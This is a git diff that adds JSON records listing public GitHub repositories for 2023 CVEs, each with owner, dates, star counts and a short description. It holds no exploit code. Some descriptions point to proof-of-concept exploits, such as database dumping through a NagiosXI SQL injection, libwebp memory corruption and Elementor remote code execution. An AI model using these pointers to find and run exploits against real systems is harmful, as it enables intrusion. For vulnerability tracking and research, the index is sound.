diff --git a/2023/CVE-2023-48029.json b/2023/CVE-2023-48029.json
new file mode 100644
index 0000000000..7cc062bec9
--- /dev/null
+++ b/2023/CVE-2023-48029.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 719714263,
+ "name": "CVE-2023-48029",
+ "full_name": "nitipoom-jar\/CVE-2023-48029",
+ "owner": {
+ "login": "nitipoom-jar",
+ "id": 149907798,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4",
+ "html_url": "https:\/\/github.com\/nitipoom-jar"
+ },
+ "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-48029",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-16T18:42:12Z",
+ "updated_at": "2023-11-16T19:01:29Z",
+ "pushed_at": "2023-11-16T19:30:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-48031.json b/2023/CVE-2023-48031.json
new file mode 100644
index 0000000000..34bf3fd549
--- /dev/null
+++ b/2023/CVE-2023-48031.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 719696300,
+ "name": "CVE-2023-48031",
+ "full_name": "nitipoom-jar\/CVE-2023-48031",
+ "owner": {
+ "login": "nitipoom-jar",
+ "id": 149907798,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4",
+ "html_url": "https:\/\/github.com\/nitipoom-jar"
+ },
+ "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-48031",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-16T17:57:20Z",
+ "updated_at": "2023-11-16T18:00:09Z",
+ "pushed_at": "2023-11-16T18:00:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-48034.json b/2023/CVE-2023-48034.json
new file mode 100644
index 0000000000..78945e02e2
--- /dev/null
+++ b/2023/CVE-2023-48034.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 721226835,
+ "name": "CVE-2023-48034",
+ "full_name": "aprkr\/CVE-2023-48034",
+ "owner": {
+ "login": "aprkr",
+ "id": 70669787,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70669787?v=4",
+ "html_url": "https:\/\/github.com\/aprkr"
+ },
+ "html_url": "https:\/\/github.com\/aprkr\/CVE-2023-48034",
+ "description": "Weak encryption in Acer Wireless Keyboard SK-9662 allows attacker in physical proximity to both decrypt wireless keystrokes and inject wireless arbitrary keystrokes.",
+ "fork": false,
+ "created_at": "2023-11-20T16:04:24Z",
+ "updated_at": "2023-11-22T14:05:37Z",
+ "pushed_at": "2023-11-20T18:40:21Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-48084.json b/2023/CVE-2023-48084.json
new file mode 100644
index 0000000000..475561713b
--- /dev/null
+++ b/2023/CVE-2023-48084.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 765513024,
+ "name": "CVE-2023-48084",
+ "full_name": "Hamibubu\/CVE-2023-48084",
+ "owner": {
+ "login": "Hamibubu",
+ "id": 108554878,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108554878?v=4",
+ "html_url": "https:\/\/github.com\/Hamibubu"
+ },
+ "html_url": "https:\/\/github.com\/Hamibubu\/CVE-2023-48084",
+ "description": "Python program to dump all the databases, exploiting NagiosXI sqli vulnerability",
+ "fork": false,
+ "created_at": "2024-03-01T04:06:15Z",
+ "updated_at": "2024-03-22T22:48:59Z",
+ "pushed_at": "2024-03-01T04:22:39Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 776233003,
+ "name": "CVE-2023-48084",
+ "full_name": "bucketcat\/CVE-2023-48084",
+ "owner": {
+ "login": "bucketcat",
+ "id": 91589201,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91589201?v=4",
+ "html_url": "https:\/\/github.com\/bucketcat"
+ },
+ "html_url": "https:\/\/github.com\/bucketcat\/CVE-2023-48084",
+ "description": "Fixes broken syntax in the POC, automates the API_Token retrieval, stores the token as a variable and pipes into the fixed POC.",
+ "fork": false,
+ "created_at": "2024-03-23T00:31:37Z",
+ "updated_at": "2024-03-23T01:16:32Z",
+ "pushed_at": "2024-03-23T04:00:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-48104.json b/2023/CVE-2023-48104.json
new file mode 100644
index 0000000000..65bbb6d17b
--- /dev/null
+++ b/2023/CVE-2023-48104.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 741537406,
+ "name": "CVE-2023-48104",
+ "full_name": "E1tex\/CVE-2023-48104",
+ "owner": {
+ "login": "E1tex",
+ "id": 134239936,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134239936?v=4",
+ "html_url": "https:\/\/github.com\/E1tex"
+ },
+ "html_url": "https:\/\/github.com\/E1tex\/CVE-2023-48104",
+ "description": "HTML Injection in Alinto\/SOGo Web Client",
+ "fork": false,
+ "created_at": "2024-01-10T15:49:48Z",
+ "updated_at": "2024-01-10T16:09:29Z",
+ "pushed_at": "2024-01-10T16:09:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-48123.json b/2023/CVE-2023-48123.json
new file mode 100644
index 0000000000..42f8113e3c
--- /dev/null
+++ b/2023/CVE-2023-48123.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 719849140,
+ "name": "CVE-2023-48123",
+ "full_name": "NHPT\/CVE-2023-48123",
+ "owner": {
+ "login": "NHPT",
+ "id": 42366434,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42366434?v=4",
+ "html_url": "https:\/\/github.com\/NHPT"
+ },
+ "html_url": "https:\/\/github.com\/NHPT\/CVE-2023-48123",
+ "description": "CVE-2023-54436 Exp",
+ "fork": false,
+ "created_at": "2023-11-17T02:56:26Z",
+ "updated_at": "2023-11-17T04:12:44Z",
+ "pushed_at": "2023-11-17T02:56:53Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4813.json b/2023/CVE-2023-4813.json
new file mode 100644
index 0000000000..e8cf2fe66d
--- /dev/null
+++ b/2023/CVE-2023-4813.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 811342524,
+ "name": "cve-2023-4813",
+ "full_name": "tnishiox\/cve-2023-4813",
+ "owner": {
+ "login": "tnishiox",
+ "id": 163162093,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163162093?v=4",
+ "html_url": "https:\/\/github.com\/tnishiox"
+ },
+ "html_url": "https:\/\/github.com\/tnishiox\/cve-2023-4813",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-06T12:12:57Z",
+ "updated_at": "2024-06-22T12:54:18Z",
+ "pushed_at": "2024-06-22T12:54:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-48197.json b/2023/CVE-2023-48197.json
new file mode 100644
index 0000000000..5adad44da1
--- /dev/null
+++ b/2023/CVE-2023-48197.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 718709477,
+ "name": "CVE-2023-48197",
+ "full_name": "nitipoom-jar\/CVE-2023-48197",
+ "owner": {
+ "login": "nitipoom-jar",
+ "id": 149907798,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4",
+ "html_url": "https:\/\/github.com\/nitipoom-jar"
+ },
+ "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-48197",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-14T16:34:21Z",
+ "updated_at": "2023-11-14T16:35:24Z",
+ "pushed_at": "2023-11-14T16:39:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-48198.json b/2023/CVE-2023-48198.json
new file mode 100644
index 0000000000..3cb545bdb5
--- /dev/null
+++ b/2023/CVE-2023-48198.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 718711709,
+ "name": "CVE-2023-48198",
+ "full_name": "nitipoom-jar\/CVE-2023-48198",
+ "owner": {
+ "login": "nitipoom-jar",
+ "id": 149907798,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4",
+ "html_url": "https:\/\/github.com\/nitipoom-jar"
+ },
+ "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-48198",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-14T16:40:03Z",
+ "updated_at": "2023-11-14T16:45:56Z",
+ "pushed_at": "2023-11-14T16:46:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-48199.json b/2023/CVE-2023-48199.json
new file mode 100644
index 0000000000..6f58c3be63
--- /dev/null
+++ b/2023/CVE-2023-48199.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 718716267,
+ "name": "CVE-2023-48199",
+ "full_name": "nitipoom-jar\/CVE-2023-48199",
+ "owner": {
+ "login": "nitipoom-jar",
+ "id": 149907798,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4",
+ "html_url": "https:\/\/github.com\/nitipoom-jar"
+ },
+ "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-48199",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-14T16:50:31Z",
+ "updated_at": "2023-11-14T16:51:45Z",
+ "pushed_at": "2023-11-14T16:51:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-48200.json b/2023/CVE-2023-48200.json
new file mode 100644
index 0000000000..e1e1c78dce
--- /dev/null
+++ b/2023/CVE-2023-48200.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 718721117,
+ "name": "CVE-2023-48200",
+ "full_name": "nitipoom-jar\/CVE-2023-48200",
+ "owner": {
+ "login": "nitipoom-jar",
+ "id": 149907798,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4",
+ "html_url": "https:\/\/github.com\/nitipoom-jar"
+ },
+ "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-48200",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-14T17:02:07Z",
+ "updated_at": "2023-11-14T17:02:57Z",
+ "pushed_at": "2023-11-14T17:02:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4863.json b/2023/CVE-2023-4863.json
new file mode 100644
index 0000000000..aad430a79b
--- /dev/null
+++ b/2023/CVE-2023-4863.json
@@ -0,0 +1,332 @@
+[
+ {
+ "id": 694489315,
+ "name": "CVE-2023-4863",
+ "full_name": "mistymntncop\/CVE-2023-4863",
+ "owner": {
+ "login": "mistymntncop",
+ "id": 105329747,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105329747?v=4",
+ "html_url": "https:\/\/github.com\/mistymntncop"
+ },
+ "html_url": "https:\/\/github.com\/mistymntncop\/CVE-2023-4863",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-21T05:22:51Z",
+ "updated_at": "2024-06-24T16:21:42Z",
+ "pushed_at": "2023-12-18T04:25:00Z",
+ "stargazers_count": 311,
+ "watchers_count": 311,
+ "has_discussions": false,
+ "forks_count": 48,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 48,
+ "watchers": 311,
+ "score": 0,
+ "subscribers_count": 15
+ },
+ {
+ "id": 696220876,
+ "name": "CVE-2023-4863",
+ "full_name": "bbaranoff\/CVE-2023-4863",
+ "owner": {
+ "login": "bbaranoff",
+ "id": 37385191,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37385191?v=4",
+ "html_url": "https:\/\/github.com\/bbaranoff"
+ },
+ "html_url": "https:\/\/github.com\/bbaranoff\/CVE-2023-4863",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-25T10:33:09Z",
+ "updated_at": "2024-05-27T11:26:57Z",
+ "pushed_at": "2023-09-25T16:09:48Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 696506973,
+ "name": "BAD-WEBP-CVE-2023-4863",
+ "full_name": "talbeerysec\/BAD-WEBP-CVE-2023-4863",
+ "owner": {
+ "login": "talbeerysec",
+ "id": 25826743,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25826743?v=4",
+ "html_url": "https:\/\/github.com\/talbeerysec"
+ },
+ "html_url": "https:\/\/github.com\/talbeerysec\/BAD-WEBP-CVE-2023-4863",
+ "description": "BAD-WEBP-CVE-2023-4863",
+ "fork": false,
+ "created_at": "2023-09-25T22:10:32Z",
+ "updated_at": "2023-10-31T10:09:27Z",
+ "pushed_at": "2023-09-25T22:13:12Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 698015658,
+ "name": "Find-VulnerableElectronVersion",
+ "full_name": "OITApps\/Find-VulnerableElectronVersion",
+ "owner": {
+ "login": "OITApps",
+ "id": 24635345,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24635345?v=4",
+ "html_url": "https:\/\/github.com\/OITApps"
+ },
+ "html_url": "https:\/\/github.com\/OITApps\/Find-VulnerableElectronVersion",
+ "description": "Scans an executable and determines if it was wrapped in an Electron version vulnerable to the Chromium vulnerability CVE-2023-4863\/ CVE-2023-5129",
+ "fork": false,
+ "created_at": "2023-09-29T00:42:37Z",
+ "updated_at": "2024-02-20T11:53:38Z",
+ "pushed_at": "2023-09-29T01:44:51Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 698469496,
+ "name": "ElectronVulnerableVersion",
+ "full_name": "GTGalaxi\/ElectronVulnerableVersion",
+ "owner": {
+ "login": "GTGalaxi",
+ "id": 10473238,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10473238?v=4",
+ "html_url": "https:\/\/github.com\/GTGalaxi"
+ },
+ "html_url": "https:\/\/github.com\/GTGalaxi\/ElectronVulnerableVersion",
+ "description": "Find Electron Apps Vulnerable to CVE-2023-4863 \/ CVE-2023-5129",
+ "fork": false,
+ "created_at": "2023-09-30T02:47:16Z",
+ "updated_at": "2024-02-20T11:53:19Z",
+ "pushed_at": "2023-10-01T00:48:15Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 700661789,
+ "name": "libwebp-checker",
+ "full_name": "murphysecurity\/libwebp-checker",
+ "owner": {
+ "login": "murphysecurity",
+ "id": 101661127,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101661127?v=4",
+ "html_url": "https:\/\/github.com\/murphysecurity"
+ },
+ "html_url": "https:\/\/github.com\/murphysecurity\/libwebp-checker",
+ "description": "A tool for finding vulnerable libwebp(CVE-2023-4863)",
+ "fork": false,
+ "created_at": "2023-10-05T03:28:23Z",
+ "updated_at": "2024-02-20T11:53:27Z",
+ "pushed_at": "2023-10-07T02:52:10Z",
+ "stargazers_count": 21,
+ "watchers_count": 21,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 21,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 717339904,
+ "name": "CVE-2023-4863",
+ "full_name": "huiwen-yayaya\/CVE-2023-4863",
+ "owner": {
+ "login": "huiwen-yayaya",
+ "id": 128218264,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128218264?v=4",
+ "html_url": "https:\/\/github.com\/huiwen-yayaya"
+ },
+ "html_url": "https:\/\/github.com\/huiwen-yayaya\/CVE-2023-4863",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-11T06:51:03Z",
+ "updated_at": "2024-06-08T08:18:54Z",
+ "pushed_at": "2024-06-08T08:18:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 733255762,
+ "name": "webp-CVE-2023-4863",
+ "full_name": "LiveOverflow\/webp-CVE-2023-4863",
+ "owner": {
+ "login": "LiveOverflow",
+ "id": 12161158,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12161158?v=4",
+ "html_url": "https:\/\/github.com\/LiveOverflow"
+ },
+ "html_url": "https:\/\/github.com\/LiveOverflow\/webp-CVE-2023-4863",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-18T23:12:25Z",
+ "updated_at": "2024-06-04T03:25:05Z",
+ "pushed_at": "2024-05-13T17:40:58Z",
+ "stargazers_count": 38,
+ "watchers_count": 38,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 38,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 733283933,
+ "name": "NotEnough",
+ "full_name": "caoweiquan322\/NotEnough",
+ "owner": {
+ "login": "caoweiquan322",
+ "id": 5418686,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5418686?v=4",
+ "html_url": "https:\/\/github.com\/caoweiquan322"
+ },
+ "html_url": "https:\/\/github.com\/caoweiquan322\/NotEnough",
+ "description": "This tool calculates tricky canonical huffman histogram for CVE-2023-4863.",
+ "fork": false,
+ "created_at": "2023-12-19T01:32:45Z",
+ "updated_at": "2024-01-02T15:07:30Z",
+ "pushed_at": "2023-12-20T15:50:01Z",
+ "stargazers_count": 26,
+ "watchers_count": 26,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 26,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 752488530,
+ "name": "CVE-2023-4863-",
+ "full_name": "CrackerCat\/CVE-2023-4863-",
+ "owner": {
+ "login": "CrackerCat",
+ "id": 17995064,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4",
+ "html_url": "https:\/\/github.com\/CrackerCat"
+ },
+ "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2023-4863-",
+ "description": "Triggering the famous libweb 0day vuln with libfuzzer",
+ "fork": false,
+ "created_at": "2024-02-04T01:33:53Z",
+ "updated_at": "2024-02-04T01:33:53Z",
+ "pushed_at": "2024-02-03T12:51:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 753983723,
+ "name": "CVE-2023-4863-POC",
+ "full_name": "alsaeroth\/CVE-2023-4863-POC",
+ "owner": {
+ "login": "alsaeroth",
+ "id": 159212133,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/159212133?v=4",
+ "html_url": "https:\/\/github.com\/alsaeroth"
+ },
+ "html_url": "https:\/\/github.com\/alsaeroth\/CVE-2023-4863-POC",
+ "description": "C implementation of libwebp 0-click vulnerability",
+ "fork": false,
+ "created_at": "2024-02-07T06:58:16Z",
+ "updated_at": "2024-02-07T06:58:17Z",
+ "pushed_at": "2024-02-07T06:58:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-48777.json b/2023/CVE-2023-48777.json
new file mode 100644
index 0000000000..04231bbb72
--- /dev/null
+++ b/2023/CVE-2023-48777.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 758657821,
+ "name": "Elementor-3.18.0-Upload-Path-Traversal-RCE-CVE-2023-48777",
+ "full_name": "AkuCyberSec\/Elementor-3.18.0-Upload-Path-Traversal-RCE-CVE-2023-48777",
+ "owner": {
+ "login": "AkuCyberSec",
+ "id": 103601332,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103601332?v=4",
+ "html_url": "https:\/\/github.com\/AkuCyberSec"
+ },
+ "html_url": "https:\/\/github.com\/AkuCyberSec\/Elementor-3.18.0-Upload-Path-Traversal-RCE-CVE-2023-48777",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-16T19:36:50Z",
+ "updated_at": "2024-05-17T14:24:09Z",
+ "pushed_at": "2024-02-16T19:39:12Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-48788.json b/2023/CVE-2023-48788.json
new file mode 100644
index 0000000000..9fd40dbc73
--- /dev/null
+++ b/2023/CVE-2023-48788.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 774039594,
+ "name": "CVE-2023-48788",
+ "full_name": "horizon3ai\/CVE-2023-48788",
+ "owner": {
+ "login": "horizon3ai",
+ "id": 79593994,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4",
+ "html_url": "https:\/\/github.com\/horizon3ai"
+ },
+ "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2023-48788",
+ "description": "Fortinet FortiClient EMS SQL Injection",
+ "fork": false,
+ "created_at": "2024-03-18T20:50:48Z",
+ "updated_at": "2024-06-05T16:33:47Z",
+ "pushed_at": "2024-03-20T20:42:41Z",
+ "stargazers_count": 43,
+ "watchers_count": 43,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 43,
+ "score": 0,
+ "subscribers_count": 5
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-48842.json b/2023/CVE-2023-48842.json
new file mode 100644
index 0000000000..8616eb8efb
--- /dev/null
+++ b/2023/CVE-2023-48842.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 726637538,
+ "name": "CVE-2023-48842",
+ "full_name": "creacitysec\/CVE-2023-48842",
+ "owner": {
+ "login": "creacitysec",
+ "id": 151768625,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151768625?v=4",
+ "html_url": "https:\/\/github.com\/creacitysec"
+ },
+ "html_url": "https:\/\/github.com\/creacitysec\/CVE-2023-48842",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-02T23:21:44Z",
+ "updated_at": "2023-12-05T03:24:20Z",
+ "pushed_at": "2023-12-03T00:11:00Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-48849.json b/2023/CVE-2023-48849.json
new file mode 100644
index 0000000000..ffea33aa2d
--- /dev/null
+++ b/2023/CVE-2023-48849.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 726024742,
+ "name": "CVE-2023-48849",
+ "full_name": "delsploit\/CVE-2023-48849",
+ "owner": {
+ "login": "delsploit",
+ "id": 127108998,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127108998?v=4",
+ "html_url": "https:\/\/github.com\/delsploit"
+ },
+ "html_url": "https:\/\/github.com\/delsploit\/CVE-2023-48849",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-01T11:24:26Z",
+ "updated_at": "2023-12-01T11:24:26Z",
+ "pushed_at": "2023-12-05T06:09:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-48858.json b/2023/CVE-2023-48858.json
new file mode 100644
index 0000000000..82545b2497
--- /dev/null
+++ b/2023/CVE-2023-48858.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 744440782,
+ "name": "CVE-2023-48858",
+ "full_name": "Shumerez\/CVE-2023-48858",
+ "owner": {
+ "login": "Shumerez",
+ "id": 52412906,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52412906?v=4",
+ "html_url": "https:\/\/github.com\/Shumerez"
+ },
+ "html_url": "https:\/\/github.com\/Shumerez\/CVE-2023-48858",
